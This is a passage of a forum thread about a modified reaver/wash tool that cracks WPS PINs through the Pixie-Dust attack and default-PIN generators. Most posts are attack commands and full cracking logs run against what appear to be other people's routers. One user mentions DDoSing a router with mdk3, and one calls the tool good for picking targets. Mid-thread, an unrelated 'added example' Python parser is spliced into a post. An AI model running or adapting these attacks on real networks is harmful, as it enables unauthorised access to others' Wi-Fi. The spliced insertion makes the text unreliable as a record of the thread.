    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 04:10:d7:4d:a0:29:b4:8e:00:85:85:47:cd:bc:5f:84:da:c0:c8:4a:f2:36:8c:56:5c:00:28:a8:90:31:14:11:0e:24:d8:e2:fe:8f:58:db:8c:f1:28:f9:e3:81:f7:93:2a:2e:10:3c:f5:ec:55:ba:95:a0:87:73:c6:83:00:f2:1f:e0:00:80:6c:c9:1f:5c:76:6f:27:df:c9:25:21:58:e5:24:c8:26:80:67:d4:18:ab:68:79:bd:06:ac:b9:0b:7d:75:68:52:99:0c:c3:1c:30:1c:80:a1:c1:49:5a:29:b6:ac:98:b5:b6:c3:c4:fe:67:80:02:ae:9f:f7:ef:34:41:02:39:e5:f6:6b:ec:73:19:b5:be:75:ed:ed:ac:d6:e4:0c:68:7a:b8:a7:a6:fe:98:9e:7f:00:3a:78:b3:69:df:9c:13:fc:8f:50:58:01:31:5a:1b:8c:81:5d:47:99:1b:d9:0a:8b:b0:49:6f:9b:1a:af:25:31:c5:10:13:8c
    [P] AuthKey: eb:35:cb:40:af:86:fd:1d:8d:bb:2e:8b:82:f8:02:e5:3d:19:3b:9d:6a:2d:52:d2:97:49:dd:97:48:e6:41:db
    [+] Sending M2 message
    [P] E-Hash1: b9:76:ae:bd:db:d4:18:bc:2d:31:2f:24:02:d5:c4:a6:82:15:2e:00:da:de:98:dd:4e:a9:bd:fc:ee:b4:bc:cd
    [P] E-Hash2: a3:9b:6a:34:d8:39:7f:9e:07:21:68:b3:67:ed:82:42:08:61:e4:25:96:6d:4d:93:d6:ba:1f:38:aa:3f:09:0f
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: b5:33:92:d2:5f:d2:d3:4a:ae:cb:81:db:c9:f6:63:a6
    [Pixie-Dust]   [*] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
    [Pixie-Dust]   [+] WPS pin: 50..........
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin, wait ...
    Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........
    
    [Reaver Test] BSSID: 8C:09:00:11:00:11
    [Reaver Test] Channel: 9
    hangs there

  12. #12
    Join Date
    2015-Apr
    Posts
    39
    nuroo

    Try with a fixed channel. Reaver is trying to get the PSK, but if reaver is not able to complete the task it stays in this loop until it does; if the router is far away it is difficult for reaver to get to the final stage.

    Better that I put in a timeout; tomorrow I will make the bug fix.


    And sorry for the credits hahaha

    It would be good if it already tried all the Ks, I'll think of something.

    Thank you again.
    Last edited by t6_x; 2015-04-15 at 09:05.

  13. #13
    Join Date
    2015-Apr
    Posts
    39
    Option -g released in wash

    Code:
    -g, --get-chipset                    Output Piped and tries to read the chipset with reaver
    Example

    Code:
    # wash -i mon0 -g -c 2
    XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
    XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U

  14. #14
    Join Date
    2014-Nov
    Posts
    7
    Quote Originally Posted by soxrok2212 View Post
    Another idea... have all the extra stuff print only with verbosity mode selected
    -v -vv -vvv maybe?

    Quote Originally Posted by soxrok2212 View Post
    Update: I'm getting a segmentation fault when I use -K 1 and -K 3

    Code:
    Segmentation fault
    I also receive the segmentation fault error...

  15. #15
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by SubZero5 View Post
    -v -vv -vvv maybe?


    I also receive segmentation fault error too...
    Any router? Or some router in specific?

  16. #16
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Thx t6x!

    Quote Originally Posted by SubZero5 View Post
    -v -vv -vvv maybe?
    Yesss. That. Keep different functions/improvements separated.

  17. #17
    Join Date
    2015-Mar
    Posts
    127
    In my original reaver command I did not specify a channel on purpose, to troubleshoot. But your code for reaver part 2 (passphrase) sets the channel automatically. NICE!
    [Pixie-Dust][*] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
    [Pixie-Dust] [+] WPS pin: 50..........
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running the reaver with the correct pin, wait ...
    Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........

    [Reaver Test] BSSID: 8C:09:00:11:00:11
    [Reaver Test] Channel: 9

    I guess the AP is just too far away, like you said.

    The -g option in wash for the chipset is an excellent idea. Better for picking targets. Can't wait to try it later.
    Last edited by nuroo; 2015-04-15 at 21:35.

  18. #18
    Join Date
    2015-Apr
    Posts
    9
    Is this version of reaver compatible with WPS version 00? Because I tried this on a TP-LINK TD-W8961ND and it always gets stuck at M2 after getting PKr, and WPS gets disabled; I have to DDoS the router with mdk3 to activate WPS again. ScreenShot_20150414174436.jpg

  19. #19
    Join Date
    2015-Apr
    Posts
    9
    It's weird, I got the same PKr when I tried Reaver on the TP-LINK TD-W8961ND. The only problem is Reaver always gets stuck at M2, so I didn't get AuthKey, E-Hash1 and E-Hash2.

  20. #20
    Join Date
    2015-Mar
    Posts
    127
    I love the -g option. Just tried it. This is a great idea.

    You're right, it does need a timer and/or an RSSI strength filter.

    Or maybe make each access point an independent process so wash can move on to the next AP, and maybe display something like "waiting......" until the response is received. (But I'm not a coder, maybe too much work.)

    00:00:00:00:B6:A0| 6|-48|1.0|No |We hear you walking upstairs| Cisco| 123456
    00:00:00:00:AD:00| 6|-47|1.0|No |TommyAndy4E| Waiting for Response..........
    00:00:00:00:37:56| 6|-56|1.0|No |100 Kane| Belkin International Inc.| RE6500
    00:00:00:00:8F:80| 6|-63|1.0|No |DG1670A82| Celeno Communication, Inc.| CL1800
    00:00:00:00:62:6C| 6|-50|1.0|No |Kirinyaga| NETGEAR, Inc.| Waiting for Response..........


    Also,
    does the -P option have no header on purpose, so it can be small in the terminal window?
    Code:
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    -------------------------------------------------------------------------------------------

  21. #21
    Join Date
    2015-Apr
    Posts
    39
    This can be done, but I have to think of a more general way to create the function a little better.

    There are certain things that run on Linux but don't work on an embedded device; I try to come up with something that works well.

    I tried to add this option to help with the search time, but this problem of it taking too long is annoying too.

    What complicates the operation is that it is necessary to make requests to the router so that it responds with all the necessary data.

    When the router is far away, it just takes a while to get the M1 message, and sometimes it doesn't even pass authentication; it is because of this that it sits on the screen waiting.

    At this point it would be interesting to create multithreaded functions, but it must be done in a way that works on all devices; it would not be good to rework the code for each platform.

    DataHead thinks that he will soon make it portable to big-endian, and thus leave it open for OpenWRT and variants.


    With regard to the header, I tried to create this function to help people who create scripts or frontends; it is easier to handle a result that is already relatively more processed.


    There comes a time when it is difficult to decide what to do; there are many options and many variations.

    Have to remember that everyone is free to help.
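    Posts #20 and #21 above treat the header-less wash output as something meant to be consumed by scripts and frontends, and post #20 shows rows where the -g chipset lookup is still "Waiting for Response". As an added example (not code from reaver-wps-fork-t6x, and not from any poster), here is a small Python parser for rows in that pipe-delimited shape, used from the defender's side to build an inventory of access points that still answer WPS and are not locked. The column order, the handling of the "Waiting for Response" cell, the sample rows and their MAC addresses are assumptions constructed from the rows shown in the thread.

```python
"""Parse the pipe-delimited rows that the modified wash prints (the
header-less shape discussed in posts #20 and #21) into records for a WPS
exposure inventory.

Added example, not code from reaver-wps-fork-t6x. The column layout is
assumed from the rows shown in the thread:
    BSSID|Channel|RSSI|WPS Version|WPS Locked|ESSID|Manufacturer|Model
and when the -g chipset lookup has not answered yet, one or both of the
last two cells read 'Waiting for Response..........'.
"""
from dataclasses import dataclass
from typing import List, Optional

WAITING = "Waiting for Response"


@dataclass
class WpsAp:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    locked: bool
    essid: str
    manufacturer: Optional[str]  # None while the -g lookup is still pending
    model: Optional[str]
    pending: bool                # True if the row carried a 'Waiting for Response' cell


def parse_wash_line(line: str) -> Optional[WpsAp]:
    """Return a WpsAp for one data row; None for blank, comment or header rows."""
    stripped = line.strip()
    if not stripped or stripped.startswith(("#", "BSSID", "-")):
        return None
    fields = [f.strip() for f in stripped.split("|")]
    if len(fields) < 6:
        raise ValueError(f"unexpected wash row: {line!r}")
    bssid, chan, rssi, version, locked, essid = fields[:6]
    rest = fields[6:]
    # A pending lookup replaces the manufacturer and/or model cell with the
    # waiting marker; keep whatever real values did arrive.
    pending = any(cell.startswith(WAITING) for cell in rest)
    known = [cell for cell in rest if cell and not cell.startswith(WAITING)]
    return WpsAp(
        bssid=bssid.upper(),
        channel=int(chan),
        rssi=int(rssi),
        wps_version=version,
        locked=locked.lower().startswith("y"),
        essid=essid,
        manufacturer=known[0] if len(known) > 0 else None,
        model=known[1] if len(known) > 1 else None,
        pending=pending,
    )


def parse_wash_output(text: str) -> List[WpsAp]:
    """Parse a whole wash capture, skipping non-data rows."""
    rows = []
    for line in text.splitlines():
        rec = parse_wash_line(line)
        if rec is not None:
            rows.append(rec)
    return rows


def wps_exposed(aps: List[WpsAp], min_rssi: int = -70) -> List[WpsAp]:
    """APs that still answer WPS (not locked) and are strong enough to be
    reachable from the capture point: the ones an audit should fix first."""
    return [ap for ap in aps if not ap.locked and ap.rssi >= min_rssi]


# Constructed sample in the shape of the thread's wash -g output (MACs are fake).
SAMPLE_WASH_OUTPUT = """\
# wash -i mon0 -g -c 6
02:00:00:00:00:01| 6|-68|1.0|No |AAA| D-Link| DIR-615
02:00:00:00:00:02| 6|-47|1.0|No |TommyAndy4E| Waiting for Response..........
02:00:00:00:00:03| 6|-50|1.0|No |Kirinyaga| NETGEAR, Inc.| Waiting for Response..........
02:00:00:00:00:04|11|-83|2.0|Yes|Locked AP| Cisco| 123456
"""

if __name__ == "__main__":
    for ap in wps_exposed(parse_wash_output(SAMPLE_WASH_OUTPUT)):
        note = " (lookup pending)" if ap.pending else ""
        print(f"{ap.bssid} ch{ap.channel} {ap.rssi} dBm {ap.essid!r} "
              f"{ap.manufacturer or '?'} {ap.model or '?'}{note}")
```

    The parser keeps a row whose chipset lookup is still pending instead of dropping it, because the BSSID, channel, RSSI and lock state are already enough to decide whether that AP belongs on the remediation list; the manufacturer and model can be filled in on a later pass.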

  22. #22
    Join Date
    2015-Mar
    Posts
    127
    Yep, ideas are the easy part.
    <////////#~~~~~~

  23. #23
    Join Date
    2015-Apr
    Location
    cosmoland
    Posts
    18

  24. #24
    Join Date
    2015-Apr
    Posts
    39
    New update

    reaver -W option

    Code:
    -W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

    Example


    Code:
    [P] E-Nonce: 27:63:ad:1f:d1:10:.......
    [P] PKE: 2f:4e:e4:10:dd:0b:0e:7e:1e:27:b9:......
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: ....
    [P] WPS Model Serial Number: ......
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 25657371

  25. #25
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    Do you know something about the bug with this pin 99985677 repeating? I tried to brute-force one D-LINK 501 but with this bug I can't. I see that other users have the same bug.

    https://code.google.com/p/reaver-wps.../detail?id=614

  26. #26
    Join Date
    2015-Apr
    Posts
    39
    Paste the reaver result

  27. #27
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    Which result? You want the result with hashes? I mention the bug because you are updating reaver with new things and ...

  28. #28
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by WaLkZ View Post
    Which result? You want the result with hashes? I mention the bug because you are updating reaver with new things and ...
    From the link that you gave me it is not clear what is happening.

    It is hard for me to analyze the problem without having a router that has this defect. Have you tried working with the options -1 and -2 to set the pin at a different position?

  29. #29
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    No. I tried 3-4 months ago with the classic method - collecting pins. https://www.google.bg/#q=99985677+pin+loop

  30. #30
    Join Date
    2015-Apr
    Posts
    9
    Please, if possible, give us a method to add more routers, and thanks.

  31. #31
    Join Date
    2015-Apr
    Posts
    14
    Hello!
    I've just tried the -W option with a TP-Link router and it gives me a pin:
    Code:
    root@root:~# reaver -i mon0 -b F8:D1:11:46:60:92 -c 6 -S -vv -W2
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 6
    [?] Restore previous session for F8:D1:11:46:60:92? [n/Y] n
    [+] Waiting for beacon from F8:D1:11:46:60:92
    [+] Associated with F8:D1:11:46:60:92 (ESSID: TP-LINK_23)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 7e:4b:d4:27:6f:5b:1b:96:92:68:ab:da:0c:0d:c1:04
    [P] PKE: 30:f4:ec:68:2c:eb:11:63:91:96:11:c9:84:b1:8b:4b:9b:72:44:47:c9:14:6a:52:04:c3:a5:eb:8d:73:0c:6b:e0:46:2f:09:84:89:64:95:a8:40:e5:61:68:d9:6f:86:13:a1:6d:a9:e0:65:08:40:2a:4e:79:b2:3d:fe:2e:09:e3:f0:de:02:bc:0e:01:21:37:15:22:c6:58:df:50:59:ae:ba:4b:28:cc:c3:ca:c8:67:9a:6b:1b:1b:a5:c8:2c:0e:0c:10:d6:fb:03:8d:5a:55:8c:57:e3:f8:b9:06:5c:af:c5:0b:47:8b:68:e5:6b:ba:3b:e4:a6:a0:5a:2b:6f:69:a3:7b:14:99:30:da:96:a6:23:fc:6e:9f:a7:5d:bc:43:2d:00:75:38:b4:3e:04:69:6f:25:0a:fb:a0:fd:04:46:a4:ed:f8:2e:f5:b6:e5:82:6c:08:5c:8b:b0:ea:da:6d:96:3b:af:40:ec:c2:80:87:d4:36:e7:5d:43:1e:de
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 66021674
    But this pin is wrong

    Code:
    root@root:~# reaver -i mon0 -b F8:D1:11:46:60:92 -c 6 -S -vv -p 66021674
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 6
    [+] Waiting for beacon from F8:D1:11:46:60:92
    [+] Associated with F8:D1:11:46:60:92 (ESSID: TP-LINK_23)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin 66021674.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 03:15:f3:fd:c4:d0:28:66:d9:b5:44:89:18:5d:76:90
    [P] PKE: fe:b2:9b:4c:0f:f0:b7:93:07:49:94:cd:8e:27:e7:66:a9:82:c5:b1:3e:57:db:10:b6:bc:7b:b5:b9:e1:a8:f1:95:28:79:0a:90:18:54:8e:f1:ed:9e:cf:36:c6:85:3e:16:54:66:f5:fc:e0:a7:75:d8:f9:70:3d:99:28:a2:49:73:dc:56:19:2b:9d:77:72:d8:47:f8:dc:d8:15:52:92:e4:3a:cd:bb:c0:c2:ff:6e:ed:a7:ed:b5:c8:3b:ee:7f:db:e2:74:7b:48:73:9a:5d:e9:26:a8:44:6e:79:43:c4:27:31:ed:5e:3b:96:19:d1:95:8a:47:0e:7a:52:b9:72:2c:bb:44:1a:d1:1d:4c:3f:cc:e4:d5:36:03:5f:68:65:b7:ba:c3:c3:6a:4f:a0:7a:d1:3f:32:23:2a:98:fb:11:24:e2:3b:0a:8d:29:f8:87:87:7d:4c:30:5c:06:1d:31:41:53:71:46:5c:fc:e9:9a:fa:1c:34:50:5b:7d:af:ec
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: fa:7d:f6:ff:8d:08:af:de:0e:06:8f:c3:e6:9e:bb:b7:57:7b:49:a8:cb:fd:e9:0f:ee:40:91:ae:94:3c:86:67
    [+] Sending M2 message
    [P] E-Hash1: c9:44:26:f8:b0:91:05:54:a8:e7:fb:e4:db:14:94:14:5a:c7:7b:d6:8a:dd:4c:f6:74:9c:9b:c5:86:4e:2b:23
    [P] E-Hash2: 4a:3a:e9:db:9d:2d:e5:d7:6d:d9:61:df:67:b4:5f:08:99:17:4a:0d:ca:90:e4:54:ff:60:d4:02:be:9e:fd:e8
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p2_index set to 1
    [+] Pin count advanced: 10001. Max pin attempts: 11000
    [+] Trying pin 66021674.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: f4:c4:53:ae:77:33:76:ca:4e:38:
    For another TP-Link router, the same situation:
    Code:
    root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11 -S -W2 -vv
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 10:FE:ED:9E:C7:92
    [+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: e9:d9:8c:79:f4:66:03:df:31:b3:c7:b0:da:2d:ad:42
    [P] PKE: 5f:3e:5a:21:2f:ad:2b:49:d9:bf:52:1a:eb:e4:a0:b9:f6:57:30:8e:58:12:d0:57:45:70:b3:d6:d5:87:43:a0:82:4e:5d:c1:46:d7:3f:86:54:b9:fe:c3:5a:c2:08:cc:a2:94:c5:ef:72:4b:0e:b9:d7:20:85:cc:60:72:34:35:10:41:8d:c0:46:4b:cd:13:a5:ce:66:b7:b8:e6:62:3a:af:3f:bc:cd:d4:5d:4e:8d:01:2c:16:fc:20:0c:d0:3a:93:e5:ef:dd:a9:f8:37:83:6b:08:6e:c8:60:92:be:68:14:e9:bd:a5:21:fa:80:ef:4c:cd:64:f4:6d:ee:59:98:f2:4f:fa:83:77:29:38:27:21:7f:12:00:89:f8:9e:f7:c4:81:83:5e:e8:e5:50:8d:07:b9:3b:f1:e5:84:a9:d0:35:8e:aa:ad:d8:aa:08:10:94:ba:2d:93:88:e9:95:ef:f4:d4:22:a2:f5:bb:fd:b3:f1:40:dc:c9:fc:0c:ce:eb
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 23276079
    
    root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11  -W2 -vv
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 10:FE:ED:9E:C7:92
    [+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 77:b4:31:9b:fa:fd:7c:69:18:2d:d6:67:61:67:39:d7
    [P] PKE: 81:a3:87:a9:28:b7:7c:31:e9:bf:84:60:a0:33:2c:45:5a:aa:d2:9c:91:4c:64:cf:da:90:3b:97:21:84:9d:d5:d2:4d:f6:df:68:73:ab:09:70:e4:d8:3c:0e:3b:75:c8:39:5a:60:ba:bd:2e:19:88:cf:cb:8a:ba:50:62:55:51:6b:b9:79:95:29:87:fc:5c:68:7f:ef:ba:d5:58:8a:2f:e3:b7:0e:dc:86:52:f6:45:7d:1a:f7:dc:ee:02:25:1a:1e:89:1c:8a:54:6f:22:d7:10:62:14:13:6e:6a:be:bd:c4:d2:95:99:c1:48:9d:0f:0e:17:6c:b5:ff:73:a9:bc:56:fa:4c:db:4d:c5:da:23:3f:9a:3f:cf:a1:0b:cc:70:d1:e3:87:ab:e8:7f:5b:14:a0:b1:60:3f:97:8d:af:c6:ea:58:0b:27:e6:20:6e:b9:ab:a1:4b:08:76:1a:33:b0:0b:65:1d:1e:20:0b:21:38:ab:a1:39:77:3a:c2:05:96
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 23276079
    
    root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11  -p 23276079 -vv
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 10:FE:ED:9E:C7:92
    [+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin 23276079.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: cd:0b:6e:a2:32:b5:73:f8:0a:6c:a7:db:f3:e8:b7:3d
    [P] PKE: 8b:c9:c8:4b:61:5a:88:87:b3:7b:b3:5b:95:91:7c:f8:59:11:85:b1:b7:4a:58:c9:7d:d5:c6:45:44:30:9c:b1:1c:2e:d2:85:88:93:86:1c:21:25:e9:d5:4b:29:38:f5:76:b9:9c:43:a4:31:fc:01:82:fb:49:18:3f:1d:0f:90:02:2b:29:9e:24:bb:6d:b0:22:75:50:4d:52:4b:88:3e:47:7a:42:bc:6a:2d:1d:18:6c:7d:98:41:07:c8:44:6d:ee:b6:07:09:b4:9e:89:a2:48:11:2f:d4:ac:aa:be:bc:f4:10:b0:db:f5:ac:fe:0c:3f:20:62:63:d7:f4:82:61:4e:8a:6d:63:53:bb:63:fa:f6:3b:f3:6d:97:e9:8a:9a:21:35:e4:96:09:ae:5b:db:79:15:49:bb:aa:f0:71:fc:91:b4:58:82:4c:07:95:7e:5e:c8:d3:e7:d2:c1:d9:3f:3f:19:9e:b1:4d:b0:a2:ea:af:9d:6f:b1:97:ac:b5:a4
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [+] Received M1 message
    [P] PKR: c7:2f:8a:a2:10:12:d9:d2:05:61:3c:a6:7a:20:80:b3:56:20:39:d9:a3:d7:a3:69:8a:c9:90:d3:6b:da:b4:8b:3e:af:6e:02:3b:7d:b6:99:8c:d1:48:c5:28:62:36:b1:c3:86:ef:75:95:ed:81:f4:f7:4f:8e:d8:b8:88:9c:f9:fe:fa:14:da:52:9d:a4:08:1a:c1:e6:ad:e6:e2:85:2d:e5:fc:e6:ef:8f:ae:05:02:b5:34:d2:4e:01:ff:49:01:c6:db:56:75:f7:05:9d:e1:22:f9:63:03:a5:2e:5e:da:e9:45:fe:6d:1b:b5:dc:a3:4b:93:9c:c8:63:44:9b:8e:7f:18:2a:21:df:bc:b9:a6:b2:42:ae:42:ca:89:59:f3:c5:c4:26:ed:b9:c5:95:d5:5e:26:be:8f:ae:b6:8c:09:8f:32:68:a5:b7:c3:50:fb:72:57:e4:db:99:57:ca:5b:e6:5e:82:94:7e:46:31:db:ac:70:33:36:a7:70:f1:cc
    [P] AuthKey: ce:03:54:4f:95:88:fd:73:eb:95:00:8d:3e:d6:4f:2d:f3:c8:55:69:84:c3:b6:25:6e:c5:4d:38:b4:7d:b6:eb
    [+] Sending M2 message
    [P] E-Hash1: 31:59:76:88:83:d2:4d:62:7d:9b:6c:f8:2d:d7:0a:66:31:ae:ed:a5:ca:de:5f:d1:17:ef:7a:a2:f0:4c:47:24
    [P] E-Hash2: 34:c6:ed:b1:2d:bf:07:ab:a2:4b:2d:2c:2d:5f:73:98:95:06:30:96:eb:eb:16:79:ef:a2:1f:10:79:c8:63:32
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p2_index set to 1
    [+] Pin count advanced: 10001. Max pin attempts: 11000
    [+] Trying pin 23276079.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    So, what is wrong? Maybe I'm using the -W option incorrectly?

  32. #32
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by fbs-16 View Post
    Hello
    So, what is wrong? Maybe I'm using the -W option incorrectly?
    Well, it just might be the fact that you're using a D-Link generator for a TP-Link AP... but no, that can't be!
    Last edited by soxrok2212; 2015-04-17 at 21:18.

  33. #33
    Join Date
    2015-Apr
    Posts
    39
    Code:
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [P] WPS Model Serial Number: 1.0
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 66021674
    You realize that the -W option works for two types of routers, D-Link and Belkin, and only for some models of these companies?
    You are trying to use the D-Link generator on a TP-Link router?

    I think this is not being done properly.

    In the output itself it says D-Link; please pay a little more attention.

  34. #34
    Join Date
    2015-Apr
    Posts
    14
    Sorry, I was too obvious. Thank you for the explanation and your work! I found only one D-Link router, but it gave me the same problem. I believe it's one of the "some models of these companies" which are protected.
    I was trying both W2 and W1:
    Code:
    reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -S -W2
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 3
    [?] Restore previous session for 14:D6:4D:2D:C7:64? [n/Y] n
    [+] Waiting for beacon from 14:D6:4D:2D:C7:64
    [+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: e4:bc:d7:2b:75:a4:10:45:54:d4:69:98:e7:fe:a0:e6
    [P] PKE: 57:09:eb:12:09:28:f1:e3:68:0f:21:fe:d8:9f:b4:15:21:31:4e:92:b9:70:55:e1:cd:59:7c:3d:c9:fc:fc:58:68:0a:60:9b:26:52:12:05:f5:17:c1:a7:a0:98:bf:40:f5:2e:8f:c1:ba:3c:bc:8b:78:d4:e5:9a:74:1b:8c:72:43:e4:a4:ed:1d:bf:00:dd:e8:39:14:c6:20:ea:57:09:8e:cc:b0:d8:fb:02:ba:71:c1:b2:ed:0a:e2:90:f3:ef:bd:1f:5a:77:59:58:52:83:3a:ec:6d:09:06:0f:1d:a9:0c:e2:7e:3e:91:35:5e:55:ac:29:4e:e3:11:59:9d:62:da:e5:fb:e7:61:9a:8d:3e:cb:d8:f1:cd:36:b2:29:91:e7:9e:46:79:9e:52:9d:d5:77:4a:43:ab:7d:87:ad:b9:d4:c9:82:19:5f:e0:7f:5a:ee:a3:48:5d:04:43:4b:b2:05:e4:4e:e8:9d:ca:f4:13:6d:d4:06:1b:88:9f:2b:75
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [Pin Gen] D-Link Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 69130571
    
    root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -p 69130571
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 3
    [+] Waiting for beacon from 14:D6:4D:2D:C7:64
    [+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin 69130571.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
